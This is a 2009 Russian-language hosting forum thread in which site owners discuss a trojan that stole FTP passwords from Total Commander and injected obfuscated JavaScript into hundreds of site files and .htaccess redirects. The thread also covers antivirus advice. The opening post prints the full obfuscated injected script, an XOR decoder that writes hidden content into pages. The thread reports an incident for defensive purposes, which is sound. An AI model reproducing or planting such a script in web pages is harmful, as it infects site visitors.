Хостинг в Украине: Новый FTP троян: Trojan.Win32.Pakes.myr -> HEUR:Trojan.Script.Iframer - Хостинг в Украине

Перейти к содержимому

Привет, гость!

 
Регистрация! Забыли пароль?
 

  • (2 Страниц)
  • +
  • 1
  • 2
  • Вы не можете создать новую тему
  • Вы не можете ответить в тему

Новый FTP троян: Trojan.Win32.Pakes.myr -> HEUR:Trojan.Script.Iframer Оценка: -----

#1 Пользователь офлайн   Aladdin 

  • ФИО: Праведно-Счастливый Аладдин Ярославович
  • PipPipPipPipPipPip
  • Группа: Пользователь хостинга
  • Сообщений: 1 609
  • Регистрация: 25 ноября 06

Отправлено 14 февраля 2009 - 14:54

12.02.2009 благодаря Доник Роме с его девятым Касперским на Кармане был зафиксирован вирус "HEUR:Trojan.Script.Iframer".
Мой доктор вэб молчал. Аваст тоже отдыхал. антивирус зайцева тоже спит.

Стал исследовать сего друга.
1. Обнаружилось постоянное соединение через ФТП и молниеносная замена index.php, auth.php, .htaccess файлов и прочих на некоторых сайтах сервера. Суммарно заменилось штук 450 файлов. В каждом файле был дописан сверху или снизу джаваскриптовый троян примерно такого вида:
<script type="text/javascript">var jGt7H3IkS=Array(63,6,19,54,61,31,22,51,12,33,0,0,0,0,0,0,49,5,4,62,2,25,29,38,39
,44,26,28,42,57,21,34,13,7,56,43,41,47,1,3,37,40,11,0,0,0,0,30,0,14,58,17,27,0,8
,
60,16,36,35,20,46,24,48,10,32,9,15,23,52,53,59,50,55,45,18),OmFORSBhopxKumqErMdN3
QYTiogrWyNLb2agSAc="Ewgns28wesYusd8GQ3Ktcs4HoLmts2gnWSInoUgO1S8wo_m96QPxqW8GQ1876sFwB74HZSgwe5R
GELf7W5P@fWgG",JjrjMmsvdcJ8K6muubIPn=0,CCdH_4HW=0,Lv0RDYvi6cLNHfJ=0,EnMfvr1feyNJmFLN6C0pI
DRx7SSTALRmlVGS,KuX2VtJp1ALLHMe=OmFORSBhopxKumqErMdN3QYTiogrWyNLb2agSAc.length,K
0
38OalUn4uJ0NbuTkOpcwrqivshmm=1024;window.status=' ';for(var uno17GYg1C=Math.ceil(KuX2VtJp1ALLHMe/K038OalUn4uJ0NbuTkOpcwrqivshmm);uno17GYg1C>0;uno17GYg1C--){EnMfvr1feyNJmFLN6C0pIDRx7SSTALRmlVGS='';for(var wwNLNtvgHo3KskNgx=Math.min(KuX2VtJp1ALLHMe,K038OalUn4uJ0NbuTkOpcwrqivshmm);wwNLN
tvgHo3KskNgx>0;wwNLNtvgHo3KskNgx--,KuX2VtJp1ALLHMe--){JjrjMmsvdcJ8K6muubIPn|=(jGt7H3IkS[OmFORSBhopxKumqErMdN3QYTiogrWyNLb2agSAc.char
CodeAt(Lv0RDYvi6cLNHfJ++)-48])<<CCdH_4HW;if(CCdH_4HW){EnMfvr1feyNJmFLN6C0pIDRx7SSTALRmlVGS+=String.fromCharCo
de(165^JjrjMmsvdcJ8K6muubIPn&255);JjrjMmsvdcJ8K6muubIPn>>=8;CCdH_4HW-=2}else CCdH_4HW=6}document.write(EnMfvr1feyNJmFLN6C0pIDRx7SSTALRmlVGS);}</script>

Что менялось в .htaccess, я так и не догнал. Но что-то менялось, так как файл отличался и датой и размером.

2. Ок. Меняю на всё, что только можно, пароли. Захожу Тотал Командорсом на некоторый и проверяю файлы. Потом проверил по логам. Руками менять так можно было целый год. Хорошо, что есть свежий утренний бэкап. Подняли из него. Счастье наступило.

3. На следующий день вечером Дима и Рома практически одновременно обнаружили опять этого зверя. Думаю, ну дела. Вчера только пароли поменял. Захожу в логи и вижу, что новый друг коннектится к тем сайтам, на которые я буквально только вчера заходил через Тотал. Проблема локализована. Что интересно, доступ проводился к ФТП со вчерашнего АйПишника. Опять вирусняк на еще большем количестве сайтов. Опять подъем из бэкапа, опять поменял везде пароли.

4. Написал в техподдержку доктор вэба. Посоветовали обновить версию ПО до пятой. Обновил. Запустил сканер всего компа. Тишина. Зайцев тоже молчит. Прислал логи техподдержке. Как что-то интересное скажет, дам знать.

5. А тем временем погуглил и нашет такую интересную инфу про данного трояна здесь:

Цитата

HEUR - значит, что троян точно не определился, он он похож на программу, совершающую зловрендные действия. Какие именно? отправьте ссылку заражённую страничку в вирусную лабораторию - newvirus - собачка - kaspersky.com, они скажут вам, правда ли это троян, как его зовут. Насчёт того, что он делает, это они не скажут, но в любом случае, антивирус заблокировал его попадание на ваш компьютер, следовательно бояться нечего smile.gif И в слдеующий раз воздержитесь, пожалуйста, от публикования ссылок на заражённые страницы.


и вот самое интересное:

Цитата

По моим сайтам: Сидит, пытаются чистить успехов пока нет. Основная проблема в том, что его проблемно"поймать". Тоесть, пример: DLE: Авторизируюсь на сайте, как админу открываютса дополнительные меню: Статистика, Модерация, Вход в Админ-панел. Клик по ссылке на админку. Ввожу ник и пароль админки- Касперский 7 орет благим матом Вирус. В то-же время, про вводе прямой ссылки на админ-панель сайта- просит ввести Ник и пароль в Админку. Ввожу и без проблем вхожу.
Ворд-Прес, блоги: То-же самое + при переходе с страниц второго уровня на третий- Вирус. При вводе Урла той-же страницы в строку браузера- все нормально.
Такое впечатление, что он цепляется "по дороге" при определенных условиях, а не на конкретной странице.
На Аккаунте хостинга 35ть сайтов. ВСЕ ОНИ были инициированы (судя по дате модификации файлов с кодом вируса) в ОДНО И ТО-ЖЕ ВРЕМЯ, с точностью до секунды. Как оказалось позже, когда был установлен Касперский, на моем копе так-же он сидел

А теперь- самое главное: В то-же время, в ту-же секунду был и НЕСАНКЦИОНИРОВАНЫЙ перевод всех денег с моего ВМИДа, на кошелек созданный за 6ть!!!!! секунд до этого
.

Пока тоталом не пользуюсь :). Жду, что скажет техподдержка доктора вэба.
Автор книги "Лампа Аладдина" с инструкцией к применению (TOP 10 в рейтинге продаж)
0

#2 Пользователь офлайн   donikroman 

  • Доктор хостинга
  • PipPipPipPipPipPip
  • Группа: Хостинг-Профессионал
  • Сообщений: 1 694
  • Регистрация: 06 августа 08

Отправлено 14 февраля 2009 - 20:58

Цитата

антивирус зайцева тоже спит.

он и будет спать, потому что на компе у тебя ничего нет. Он не работаете в фоновом режиме. Трояна ты берешь с инфицированной веб страницы, трояном все пассы снимаются с Тотала, отдаются и трояна на компе нет (есть и такие модификации которые заметают за собой следы). Все чаще прихожу к мнению, что для работы (бизнеса) в сети нужно две машины - одна исключительно для работы с сайтами и электрическими кошельками (причем без асек, и прочих сервисов) вторая для серфинга. Облегченный вариант - две ОСи. Возможно линуксоидам покажется смешным, но для защиты видузятникам могу рекомендовать ставить второй осью висту (она становится второй к ХР, наоборот не пробуйте - ХР второй ОСью с вистой не становится - сносит висту). Виста даже сама себя обновляться без разрешения не пускает и не запускает свои же файлы пока не спросит. Да, тормозит, да кривая. Да каспер тяжелый и вместе жрут они ресурсов мама не горюй. Но одно маленькое но лично для меня перевешивает - я два года не переустанавливал ось там где стоит каспер. и ни разу ничего не хватал там где осью виста.
ЗЫ. если кто мне будет рассказывать какой каспер дырявый, то внимательно выслушаю того у кого лицензионный Internet Security 2009
0

#3 Пользователь офлайн   jansen 

  • Управляющий порталом
  • PipPipPipPip
  • Перейти к блогу
  • Перейти к галерее
  • Группа: Хостинг-Профессионал
  • Сообщений: 741
  • Регистрация: 30 октября 08

Отправлено 14 февраля 2009 - 21:41

Я уже как второй год пользуюсь Касперским и доволен им немеренно... Троянов он не пускает, в отличие от других антивирусов... Грузит комп? Так за то винда у меня уже почти два года работает без проблем. Другие антивируси отдыхают.
Да я согласен, что для серьёзных проектов надо пользоваться отдельным железом и сугубо только по обслуживанию ресурсов, без всяких блудов по Интернету... осторожность ещё никому не мещала, защита прежде всего... конечно всё же лучше предупредить, чем лечить...

Сообщение отредактировал jansen: 14 февраля 2009 - 21:43

0

#4 Пользователь офлайн   Aladdin 

  • ФИО: Праведно-Счастливый Аладдин Ярославович
  • PipPipPipPipPipPip
  • Группа: Пользователь хостинга
  • Сообщений: 1 609
  • Регистрация: 25 ноября 06

Отправлено 15 февраля 2009 - 16:54

Установил я себе Kaspersky Internet Security 2009 пробную версию на месяц: http://www.kaspersky...apter=186545270

Установил, запустил. Делаю быструю проверку. И Касперский выдает красивое окошко:
Прикрепленный файл  virus_founded.PNG (50,17К)
Количество загрузок:: 18

Три раза перезагрузился и вуаля - красота и прелесть.
Полная проверка нашла еще парочку друзей.
Спасибо Касперскому, Спасибо Роме и Вадиму за рекомендацию.

P.S. Захожу в поисковики, посмотреть, что это за чудо такое "Trojan.Win32.Pakes.myr". Что интересно. Гугель и Яндекс слыхом не слыхивали о сием создании. Таки новый. Свежачек прямо.
Автор книги "Лампа Аладдина" с инструкцией к применению (TOP 10 в рейтинге продаж)
0

#5 Пользователь офлайн   Fenix 

  • Активист хостинга
  • Pip
  • Группа: Хостер
  • Сообщений: 78
  • Регистрация: 23 января 07

Отправлено 16 февраля 2009 - 13:04

Просмотр сообщенияAladdin (14.2.2009, 14:54) писал:

1
Что менялось в .htaccess, я так и не догнал. Но что-то менялось, так как файл отличался и датой и размером.



Дописывается редирект.
Если переход с поисковых систем, то перенаправить на сайт ...
Воруют поисковый траф.

Было уже парочку клиентов с этой бедой.
0

#6 Пользователь офлайн   KirHost.com 

  • Улучшаем качество услуг!
  • PipPipPipPipPipPipPip
  • Перейти к блогу
  • Перейти к галерее
  • Группа: Хостер
  • Сообщений: 2 827
  • Регистрация: 11 февраля 08

Отправлено 16 февраля 2009 - 13:32

так если есть редирект на сайт, но я так думаю можно найти и самого виновника?!
KirHost.com - сердце Вашего бизнеса!
0

#7 Пользователь офлайн   Aladdin 

  • ФИО: Праведно-Счастливый Аладдин Ярославович
  • PipPipPipPipPipPip
  • Группа: Пользователь хостинга
  • Сообщений: 1 609
  • Регистрация: 25 ноября 06

Отправлено 16 февраля 2009 - 13:45

Просмотр сообщенияAcTEpi_X (16.2.2009, 13:32) писал:

так если есть редирект на сайт, но я так думаю можно найти и самого виновника?!


Ой. А я даже и не сохранил на память ни одного .htaccess
Автор книги "Лампа Аладдина" с инструкцией к применению (TOP 10 в рейтинге продаж)
0

#8 Пользователь офлайн   donikroman 

  • Доктор хостинга
  • PipPipPipPipPipPip
  • Группа: Хостинг-Профессионал
  • Сообщений: 1 694
  • Регистрация: 06 августа 08

Отправлено 16 февраля 2009 - 20:23

Просмотр сообщенияFenix (16.2.2009, 13:04) писал:

Дописывается редирект.
Если переход с поисковых систем, то перенаправить на сайт ...
Воруют поисковый траф.


В редких случаях воруют и отдают на дорвеи, чаще редиректят на зараженные (без ведома владельцев) сайты откуда подгружается вредоностное ПО

Просмотр сообщенияAcTEpi_X (16.2.2009, 13:32) писал:

так если есть редирект на сайт, но я так думаю можно найти и самого виновника?!

они тоже не виновники, а мягко говоря .... имеющие гимморой
0

#9 Пользователь офлайн   KirHost.com 

  • Улучшаем качество услуг!
  • PipPipPipPipPipPipPip
  • Перейти к блогу
  • Перейти к галерее
  • Группа: Хостер
  • Сообщений: 2 827
  • Регистрация: 11 февраля 08

Отправлено 16 февраля 2009 - 20:30

в общем замкнутый круг в котором найти виновного не возможно!
KirHost.com - сердце Вашего бизнеса!
0

#10 Пользователь офлайн   donikroman 

  • Доктор хостинга
  • PipPipPipPipPipPip
  • Группа: Хостинг-Профессионал
  • Сообщений: 1 694
  • Регистрация: 06 августа 08

Отправлено 16 февраля 2009 - 20:36

Просмотр сообщенияAcTEpi_X (16.2.2009, 20:30) писал:

в общем замкнутый круг в котором найти виновного не возможно!


Его и искать не нужно. просто в зеркало посмотреть. Мы все часто говорим, что сеть это мир и тому подобное, мы в этом мире проводим половину времени. Но почему то в реале мы смотрим под ноги, переходя дорогу мы смотрим на дорогу, в мокрый снег не выходим босиком, не жалеем денег на удобную качественную обувь и одежду, а в сети нет. Это приходит только со временем и опытом. порой довольно дорогим.
0

#11 Пользователь офлайн   KirHost.com 

  • Улучшаем качество услуг!
  • PipPipPipPipPipPipPip
  • Перейти к блогу
  • Перейти к галерее
  • Группа: Хостер
  • Сообщений: 2 827
  • Регистрация: 11 февраля 08

Отправлено 16 февраля 2009 - 20:38

оффторик
Как не странно но лицензионный нод32 тоже не чего не нашел. Дайте ссылочку где можно купить Касперского:) Большое спасибо.
KirHost.com - сердце Вашего бизнеса!
0

#12 Пользователь офлайн   donikroman 

  • Доктор хостинга
  • PipPipPipPipPipPip
  • Группа: Хостинг-Профессионал
  • Сообщений: 1 694
  • Регистрация: 06 августа 08

Отправлено 16 февраля 2009 - 20:50

триал
купить
все равно пошлют на софткей
0

#13 Пользователь офлайн   KirHost.com 

  • Улучшаем качество услуг!
  • PipPipPipPipPipPipPip
  • Перейти к блогу
  • Перейти к галерее
  • Группа: Хостер
  • Сообщений: 2 827
  • Регистрация: 11 февраля 08

Отправлено 16 февраля 2009 - 21:04

т.е 528.00 грн так?
KirHost.com - сердце Вашего бизнеса!
0

#14 Пользователь офлайн   donikroman 

  • Доктор хостинга
  • PipPipPipPipPipPip
  • Группа: Хостинг-Профессионал
  • Сообщений: 1 694
  • Регистрация: 06 августа 08

Отправлено 16 февраля 2009 - 21:11

Просмотр сообщенияAcTEpi_X (16.2.2009, 21:04) писал:

т.е 528.00 грн так?


ну получается так. хотя поищи в сети, может кто из их партнеров демпингует. или спроси в офлайновых магазинах, у них коробочные версии. Кто компами торгует в больших кол-вах, может быть дешевле. я продлевал, поэтому не знаю что там сейчас стоит
0

#15 Гость_ComfoPlace.com_*

  • Группа: Гость хостинга

Отправлено 17 февраля 2009 - 08:12

AcTEpi_X
Yo! Я уже где то тут писал про софт. Обращайтесь. Мы официально продаём любое ПО. От SPLA/Box продуктов Microsoft и до всяких там BitDefender'ов и Касперских.
Конкретно по Каперскому:

Цитата

Kaspersky Internet Security 2009

Оптимальная защита. Kaspersky Internet Security 2009 – самый популярный продукт «Лаборатории Касперского» для защиты компьютера. Программа включает в себя все необходимое для безопасной работы в Интернете.

Цена 375 грн. (1 год - 2 ПК)

Можно за подробностями в ЛС, Аську (у тебя есть моя), на ящик soft@ .
Оплата - как угодно. Наличный, безналичный, банк. Чек, коробка и так далее прилагается. Подробности в софтовом отделе можно узнать.
P.S: Даже возможен вариант за WebMoney купить. Вот так :)

Цитата

может кто из их партнеров демпингует

Ну на самом деле, это не совсем так. Политика формирования цен на софтвар есть общепринятая. Так что тут, кто как и с кем работает по поставкам лицензий ;)
0

#16 Пользователь офлайн   kenanik 

  • Участник хостинг-жизни
  • Группа: Пользователь хостинга
  • Сообщений: 11
  • Регистрация: 16 марта 09

Иконки сообщения  Отправлено 16 марта 2009 - 21:37

Пожалуйста Помогите мне удалить этот Вирус с моего Сайта=(((( HEUR:Trojan.Script.Iframer
0

#17 Пользователь офлайн   KirHost.com 

  • Улучшаем качество услуг!
  • PipPipPipPipPipPipPip
  • Перейти к блогу
  • Перейти к галерее
  • Группа: Хостер
  • Сообщений: 2 827
  • Регистрация: 11 февраля 08

Отправлено 16 марта 2009 - 21:48

в конце кода индексного сайта есть строчка которая начинается с:
<script>
уделите её и все что после нее.
*это последняя строчка в коде!
KirHost.com - сердце Вашего бизнеса!
0

#18 Пользователь офлайн   kenanik 

  • Участник хостинг-жизни
  • Группа: Пользователь хостинга
  • Сообщений: 11
  • Регистрация: 16 марта 09

Отправлено 16 марта 2009 - 22:02

Такого нету нигд(((( помогитее
0

#19 Пользователь офлайн   KirHost.com 

  • Улучшаем качество услуг!
  • PipPipPipPipPipPipPip
  • Перейти к блогу
  • Перейти к галерее
  • Группа: Хостер
  • Сообщений: 2 827
  • Регистрация: 11 февраля 08

Отправлено 16 марта 2009 - 22:24

дайте ссылку на сайт!
KirHost.com - сердце Вашего бизнеса!
0

#20 Пользователь офлайн   kenanik 

  • Участник хостинг-жизни
  • Группа: Пользователь хостинга
  • Сообщений: 11
  • Регистрация: 16 марта 09

Отправлено 16 марта 2009 - 22:29

www.otval.net
0

  • (2 Страниц)
  • +
  • 1
  • 2
  • Вы не можете создать новую тему
  • Вы не можете ответить в тему

1 человек читают эту тему
0 пользователей, 1 гостей, 0 скрытых пользователей